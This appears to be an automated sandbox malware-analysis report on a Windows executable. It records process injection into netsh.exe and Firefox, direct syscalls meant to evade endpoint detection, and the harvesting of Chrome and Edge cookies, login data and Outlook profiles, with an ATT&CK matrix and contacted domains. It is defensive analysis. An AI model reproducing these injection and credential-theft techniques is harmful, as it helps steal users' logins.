            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011009AD mov eax, dword ptr fs:[00000030h]1_2_011009AD
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011009AD mov eax, dword ptr fs:[00000030h]1_2_011009AD
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h]1_2_0110A9D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h]1_2_0110A9D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h]1_2_0110A9D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h]1_2_0110A9D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h]1_2_0110A9D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A9D0 mov eax, dword ptr fs:[00000030h]1_2_0110A9D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011349D0 mov eax, dword ptr fs:[00000030h]1_2_011349D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CA9D3 mov eax, dword ptr fs:[00000030h]1_2_011CA9D3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011969C0 mov eax, dword ptr fs:[00000030h]1_2_011969C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011329F9 mov eax, dword ptr fs:[00000030h]1_2_011329F9
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011329F9 mov eax, dword ptr fs:[00000030h]1_2_011329F9
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118E9E0 mov eax, dword ptr fs:[00000030h]1_2_0118E9E0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118C810 mov eax, dword ptr fs:[00000030h]1_2_0118C810
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A483A mov eax, dword ptr fs:[00000030h]1_2_011A483A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A483A mov eax, dword ptr fs:[00000030h]1_2_011A483A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A830 mov eax, dword ptr fs:[00000030h]1_2_0113A830
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122835 mov eax, dword ptr fs:[00000030h]1_2_01122835
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122835 mov eax, dword ptr fs:[00000030h]1_2_01122835
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122835 mov eax, dword ptr fs:[00000030h]1_2_01122835
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122835 mov ecx, dword ptr fs:[00000030h]1_2_01122835
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122835 mov eax, dword ptr fs:[00000030h]1_2_01122835
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122835 mov eax, dword ptr fs:[00000030h]1_2_01122835
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01130854 mov eax, dword ptr fs:[00000030h]1_2_01130854
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104859 mov eax, dword ptr fs:[00000030h]1_2_01104859
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104859 mov eax, dword ptr fs:[00000030h]1_2_01104859
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01112840 mov ecx, dword ptr fs:[00000030h]1_2_01112840
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01196870 mov eax, dword ptr fs:[00000030h]1_2_01196870
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01196870 mov eax, dword ptr fs:[00000030h]1_2_01196870
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118E872 mov eax, dword ptr fs:[00000030h]1_2_0118E872
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118E872 mov eax, dword ptr fs:[00000030h]1_2_0118E872
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118C89D mov eax, dword ptr fs:[00000030h]1_2_0118C89D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100887 mov eax, dword ptr fs:[00000030h]1_2_01100887
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E8C0 mov eax, dword ptr fs:[00000030h]1_2_0112E8C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D08C0 mov eax, dword ptr fs:[00000030h]1_2_011D08C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C8F9 mov eax, dword ptr fs:[00000030h]1_2_0113C8F9
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C8F9 mov eax, dword ptr fs:[00000030h]1_2_0113C8F9
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CA8E4 mov eax, dword ptr fs:[00000030h]1_2_011CA8E4
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h]1_2_0117EB1D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h]1_2_0117EB1D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h]1_2_0117EB1D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117EB1D mov eax, dword ptr fs:[00000030h]1_2_0117EB1D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: yZcecBUXN7.exe, WO-.cs; Reference to suspicious API methods: _003B_2964_05B4.MapVirtualKey(_05B5.union.keyboardInput.wVk, 0)
            Source: yZcecBUXN7.exe, ---.cs; Reference to suspicious API methods: _003B_2964_05B4.GetAsyncKeyState(16)
            Source: yZcecBUXN7.exe, ---.cs; Reference to suspicious API methods: _003B_2964_05B4.OpenProcess(_FFFDi, _0739_0300, K_07FB_06E8)
            Source: 0.2.yZcecBUXN7.exe.5330000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs; Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 0.2.yZcecBUXN7.exe.5330000.4.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs; Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe; Memory written: C:\Users\user\Desktop\yZcecBUXN7.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe; Section loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe; Section loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netsh.exe; Section loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: read write
            Source: C:\Windows\SysWOW64\netsh.exe; Section loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netsh.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netsh.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netsh.exe; Thread register set: target process: 3020
            Source: C:\Windows\SysWOW64\netsh.exe; Thread APC queued: target process: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe; Process created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
            Source: C:\Windows\SysWOW64\netsh.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: yZcecBUXN7.exe; Binary or memory string: Progman
            Source: yZcecBUXN7.exe; Binary or memory string: IsProgmanWindow
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: }Program Manager
            Source: yZcecBUXN7.exe; Binary or memory string: CommentsWindows Progman Group ConverterL
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe; Queries volume information: C:\Users\user\Desktop\yZcecBUXN7.exe VolumeInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe; Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

            Stealing of Sensitive Information

            Source: Yara match; File source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netsh.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netsh.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netsh.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netsh.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netsh.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netsh.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netsh.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netsh.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netsh.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match; File source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 412 Process Injection | 1 Abuse Elevation Control Mechanism | Security Account Manager | 21 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 41 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Software Packing | LSA Secrets | 51 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Timestomp | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Masquerading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 51 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 412 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435169 Sample: yZcecBUXN7.exe Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 28 www.yamiyasheec.online 2->28 30 www.vavada-band.ru 2->30 32 19 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 6 other signatures 2->48 10 yZcecBUXN7.exe 3 2->10         started        signatures3 process4 signatures5 60 Injects a PE file into a foreign processes 10->60 13 yZcecBUXN7.exe 10->13         started        process6 signatures7 62 Maps a DLL or memory area into another process 13->62 16 jBaxmaKIzqHZYEOPQcTTJTXx.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netsh.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 